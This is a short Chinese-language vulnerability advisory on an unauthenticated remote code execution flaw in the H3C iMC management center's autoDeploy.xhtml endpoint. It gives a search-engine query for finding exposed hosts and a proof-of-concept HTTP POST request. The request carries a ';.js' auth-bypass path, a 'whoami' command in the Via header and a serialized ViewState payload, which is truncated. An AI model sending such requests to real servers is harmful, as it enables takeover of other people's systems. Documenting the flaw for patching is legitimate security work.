0x01 产品简介
H3C iMC智能管理中心是一款基于B/S架构推出的综合网络管理产品。IMC以网络管理为核心,特别强调网络中的各种资源、用户和网络服务。其目标是为网络管理员提供一种集成资源、用户和网络服务的网络管理解决方案,实现对网络的端到端管理。它融合了当前多个产品,以统一风格提供与网络相关的各类管理、控制、监控等功能;同时以开放的组件化的架构原型,向平台及其承载业务提供分布式、分级式交互管理特性;并未业务软件的下一代产品提供最可靠的、可扩展、高性能的业务平台。
0x02 漏洞概述
H3C iMC智能管理中心 /mc/autoDeploy.xhtml 接口处存在远程代码执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。该漏洞利用难度较低,建议受影响的用户尽快修复。
0x03 复现环境
HUNTER:web.title=="用户自助服务"
0x04 漏洞复现
PoC
POST /imc/autoDeploy.xhtml;.js HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.2558.72 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Via: whoami
javax.faces.ViewState=8SzWaaoxnkq9php028NtXbT98DEcA...Uh57HB/L8xz6eq%2